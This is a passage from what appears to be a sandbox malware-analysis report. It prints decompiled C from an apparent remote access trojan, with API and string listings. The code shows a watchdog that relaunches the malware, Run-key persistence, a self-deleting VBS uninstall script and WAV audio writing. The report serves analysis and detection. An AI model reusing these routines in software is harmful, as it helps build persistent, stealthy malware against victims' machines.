								} else {
									E00410D11(E00401F87(0x46e5a8), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E0040247B();
						if(E00418337(E00401F87( &_v32), _t55,  &_v556, _t71) == 0) {
							E00432D80(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E0040247B();
							_t70 = E00418337(E00401F87( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

























                                                                                                0x0040fde6
                                                                                                0x0040fde8
                                                                                                0x0040fdec
                                                                                                0x0040fdff
                                                                                                0x0040fe0c
                                                                                                0x0040fe14
                                                                                                0x0040fe25
                                                                                                0x0040fe39
                                                                                                0x0040fe3e
                                                                                                0x0040fe43
                                                                                                0x0040fe4f
                                                                                                0x0040fe64
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040fe75
                                                                                                0x0040fe7a
                                                                                                0x0040fe81
                                                                                                0x0040fe87
                                                                                                0x0040fea5
                                                                                                0x0041001c
                                                                                                0x0041001c
                                                                                                0x0040fe46
                                                                                                0x0040fe46
                                                                                                0x0040fe46
                                                                                                0x0040feab
                                                                                                0x0040feb1
                                                                                                0x0040feb8
                                                                                                0x0040fec0
                                                                                                0x0040fec6
                                                                                                0x0040ff7c
                                                                                                0x0040ff87
                                                                                                0x0040ff89
                                                                                                0x0040ff8e
                                                                                                0x0040ffa5
                                                                                                0x0040ffa9
                                                                                                0x0040ffab
                                                                                                0x0040ffc8
                                                                                                0x0040ffad
                                                                                                0x0040ffbb
                                                                                                0x0040ffc0
                                                                                                0x0040ffce
                                                                                                0x00000000
                                                                                                0x0040ff8e
                                                                                                0x0040fed1
                                                                                                0x0040feed
                                                                                                0x0040ff07
                                                                                                0x0040ff0c
                                                                                                0x0040ff1b
                                                                                                0x0040ff35
                                                                                                0x0040ff47
                                                                                                0x0040ff58
                                                                                                0x0040ff6b
                                                                                                0x0040ff72
                                                                                                0x0040ff74
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040ff76
                                                                                                0x00000000
                                                                                                0x0040ff76
                                                                                                0x0040feef
                                                                                                0x00000000
                                                                                                0x0040ffd2
                                                                                                0x0040ffd5
                                                                                                0x0040ffe3
                                                                                                0x0040ffe8
                                                                                                0x0040ffef
                                                                                                0x0040fff5
                                                                                                0x00410014
                                                                                                0x00000000
                                                                                                0x0040feb1
                                                                                                0x0040fe45
                                                                                                0x0040fe45
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,hpg,0046E5A8,00000000), ref: 0040FDEC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FDFF
                                                                                                  • Part of subcall function 00410A5F: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00410A7B
                                                                                                  • Part of subcall function 00410A5F: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410A94
                                                                                                  • Part of subcall function 00410A5F: RegCloseKey.ADVAPI32(00000000), ref: 00410A9F
                                                                                                • ExitProcess.KERNEL32 ref: 0040FE46
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FE6F
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FE7A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FE81
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE87
                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040FEB8
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FF87
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FFDD
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FFE8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FFEF
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FFF5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                                                                                                • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$hpg$open$temp_
                                                                                                • API String ID: 2645874385-2295662049
                                                                                                • Opcode ID: 2e89c464562e4461e14d798b06b8937e2a5012541605e944512462fcc914ab84
                                                                                                • Instruction ID: 8fb13afc9366eaa05f155c0dfa1e6065d0e9df949325238f3e65443df0059d17
                                                                                                • Opcode Fuzzy Hash: 2e89c464562e4461e14d798b06b8937e2a5012541605e944512462fcc914ab84
                                                                                                • Instruction Fuzzy Hash: E451D871A0031A6BDB10B7B09C49EEE336C9B4571DF24017BB901A71D2EF789D858BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040ADA8, Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E0040ADA8() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E00410199();
				if( *0x46c9c4 != 0x30) {
					E00409DA8();
				}
				_t227 =  *0x46dd5f - 1; // 0x0
				if(_t227 == 0) {
					E00415D62(_t227);
				}
				if( *0x46da75 != 0) {
					E00418144(E00401EDD(0x46e0d4));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46daf6 - 1; // 0x1
				if(_t229 == 0) {
					E00410D8B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EDD(0x46e578));
				}
				_t230 =  *0x46daef - 1; // 0x0
				if(_t230 == 0) {
					E00410D8B(0x80000002, _t214, E00401EDD(0x46e578));
				}
				_t231 =  *0x46daf4 - 1; // 0x0
				if(_t231 == 0) {
					E00410D8B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EDD(0x46e578));
				}
				E00432D80(0,  &_v668, 0, 0x208);
				_t49 = E0040247B();
				_t50 = E00401F87(0x46e5f0);
				_t53 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F87(0x46e5a8));
				_t56 = E00407647(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00401EDD(0x46e5c0), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E00403098(_t123,  &_v148, E00417CCA( &_v76, E00417A83( &_v28)), 0, _t233, L".vbs");
				E00401EE2();
				E00401FB9();
				E0040440A(_t123,  &_v124, E00403098(_t123,  &_v28, E00404260(_t123,  &_v76, E00437AEF(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				E00401EE2();
				E00401EE2();
				E004043E6(_t123,  &_v52, L"On Error Resume Next\n", _t233, E00404260(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00401EE2();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E00403303(E00403098(_t124,  &_v28, E004043E6(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E00404260(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					E00401EE2();
					E00401EE2();
					E00401EE2();
				}
				E00403303(E00403098(_t124,  &_v100, E00403098(_t124,  &_v28, E00404260(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040778C(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E00407647(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E00403303(E00403098(0x46079c,  &_v100, E00409E9E( &_v28, L"fso.DeleteFolder \"", _t236, 0x46e5c0), 0, _t236, L"\"\n"));
					E00401EE2();
					E00401EE2();
				}
				E0040778C(0x46079c,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00401EDD( &_v124);
				_t85 = E0040247B();
				if(E00418337(E00401EDD( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00401EDD( &_v124), 0x46079c, 0x46079c, 0);
				}
				ExitProcess(0);
			}























                                                                                                0x0040adb4
                                                                                                0x0040adc0
                                                                                                0x0040adc2
                                                                                                0x0040adc2
                                                                                                0x0040adca
                                                                                                0x0040add0
                                                                                                0x0040add2
                                                                                                0x0040add2
                                                                                                0x0040adde
                                                                                                0x0040adec
                                                                                                0x0040adec
                                                                                                0x0040adf6
                                                                                                0x0040adfb
                                                                                                0x0040ae01
                                                                                                0x0040ae12
                                                                                                0x0040ae17
                                                                                                0x0040ae18
                                                                                                0x0040ae1e
                                                                                                0x0040ae2f
                                                                                                0x0040ae34
                                                                                                0x0040ae35
                                                                                                0x0040ae3b
                                                                                                0x0040ae4f
                                                                                                0x0040ae54
                                                                                                0x0040ae65
                                                                                                0x0040ae74
                                                                                                0x0040ae7c
                                                                                                0x0040ae9d
                                                                                                0x0040aea5
                                                                                                0x0040aea7
                                                                                                0x0040aeb2
                                                                                                0x0040aeb2
                                                                                                0x0040aec5
                                                                                                0x0040aed7
                                                                                                0x0040aee2
                                                                                                0x0040aee4
                                                                                                0x0040aef3
                                                                                                0x0040aef3
                                                                                                0x0040af08
                                                                                                0x0040af0f
                                                                                                0x0040af28
                                                                                                0x0040af31
                                                                                                0x0040af39
                                                                                                0x0040af6e
                                                                                                0x0040af77
                                                                                                0x0040af7f
                                                                                                0x0040af9a
                                                                                                0x0040afa3
                                                                                                0x0040afa8
                                                                                                0x0040afa8
                                                                                                0x0040afab
                                                                                                0x0040afdf
                                                                                                0x0040afe7
                                                                                                0x0040afef
                                                                                                0x0040aff7
                                                                                                0x0040aff7
                                                                                                0x0040b02f
                                                                                                0x0040b037
                                                                                                0x0040b03f
                                                                                                0x0040b047
                                                                                                0x0040b04c
                                                                                                0x0040b04e
                                                                                                0x0040b058
                                                                                                0x0040b058
                                                                                                0x0040b06b
                                                                                                0x0040b070
                                                                                                0x0040b072
                                                                                                0x0040b097
                                                                                                0x0040b09f
                                                                                                0x0040b0a7
                                                                                                0x0040b0a7
                                                                                                0x0040b0b4
                                                                                                0x0040b0bd
                                                                                                0x0040b0c6
                                                                                                0x0040b0e4
                                                                                                0x0040b0f8
                                                                                                0x0040b0f8
                                                                                                0x0040b0ff

                                                                                                APIs
                                                                                                  • Part of subcall function 00410199: TerminateProcess.KERNEL32(00000000,?,0040ADB9), ref: 004101A9
                                                                                                  • Part of subcall function 00410199: WaitForSingleObject.KERNEL32(000000FF,?,0040ADB9), ref: 004101BC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040AEB2
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEC5
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040AEF3
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040AF01
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(00408881,00000000,?,0040ADC7), ref: 00409DB7
                                                                                                  • Part of subcall function 00409DA8: UnhookWindowsHookEx.USER32(00000000), ref: 00409DC7
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(Function_00008866,00000000,?,0040ADC7), ref: 00409DD9
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040B0F8
                                                                                                • ExitProcess.KERNEL32 ref: 0040B0FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$0f$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$x(f
                                                                                                • API String ID: 3659626935-1979138167
                                                                                                • Opcode ID: 5913b6c86f9592883f5985328183df623a6b08be90e15b5d4b3f0ae7e31f2d3f
                                                                                                • Instruction ID: bb67d2f1cc060f5b836f34edc1f555fa46a9c6b40fbef6dea4b6e95154a67b63
                                                                                                • Opcode Fuzzy Hash: 5913b6c86f9592883f5985328183df623a6b08be90e15b5d4b3f0ae7e31f2d3f
                                                                                                • Instruction Fuzzy Hash: 9A81A171A001186ACB14FBA2DCA69EF77699F50308F14007FF506B71E2EE7C5D8A869D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401A56, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00401A56(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46da9a & 0x0000ffff;
				_t83 = ( *0x46daa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46da9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46da9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46da9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46daa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}















                                                                                                0x00401a65
                                                                                                0x00401a68
                                                                                                0x00401a6f
                                                                                                0x00401a72
                                                                                                0x00401a79
                                                                                                0x00401a8c
                                                                                                0x00401a91
                                                                                                0x00401aa2
                                                                                                0x00401aaa
                                                                                                0x00401ab5
                                                                                                0x00401abb
                                                                                                0x00401ac4
                                                                                                0x00401ac9
                                                                                                0x00401ae5
                                                                                                0x00401af4
                                                                                                0x00401b04
                                                                                                0x00401b14
                                                                                                0x00401b23
                                                                                                0x00401b32
                                                                                                0x00401b42
                                                                                                0x00401b52
                                                                                                0x00401b61
                                                                                                0x00401b70
                                                                                                0x00401b80
                                                                                                0x00401b90
                                                                                                0x00401b9f
                                                                                                0x00401bad
                                                                                                0x00401bb0
                                                                                                0x00000000
                                                                                                0x00401bb6
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ABE
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE5
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF4
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B04
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B14
                                                                                                • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B23
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B32
                                                                                                • WriteFile.KERNEL32(00000000,0046DA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B42
                                                                                                • WriteFile.KERNEL32(00000000,0046DA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B52
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B61
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B70
                                                                                                • WriteFile.KERNEL32(00000000,0046DAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B80
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B90
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 16c098fd1daa7608eb1fce459ed88d74f7109c1c7fae6d4cba85baecba85c95a
                                                                                                • Instruction ID: a9c16d0427254a6df8bd8019202ff59db17a4ff3cc7d834d63ff0d13a2e39a0e
                                                                                                • Opcode Fuzzy Hash: 16c098fd1daa7608eb1fce459ed88d74f7109c1c7fae6d4cba85baecba85c95a
                                                                                                • Instruction Fuzzy Hash: 84410CB5E50218BAE710DA918C86FFFBBBCDB45B10F504056F704EA1C0E7B49A05DBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004488FD, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 87%
                                                                                                			E004488FD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00432530(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E00438932())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46d4d0; // 0x65eb40
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46d4dc; // 0x65eb40
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46d4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00448FA5(_t298);
												E004414D5(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E004414D5( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00448FA5(_t298);
											E004414D5(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46d4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E00440628(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E004414D5(_t300);
												goto L12;
											} else {
												_t131 = E0043CAAC(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E00437736();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00452197(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E00438932())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46d4d4; // 0x676fa0
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46d4d8; // 0x65ee58
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46d4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E00448F38(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00448FA5(_t302);
																					E004414D5(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E004414D5( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00448FA5(_t302);
																				E004414D5(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46d4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
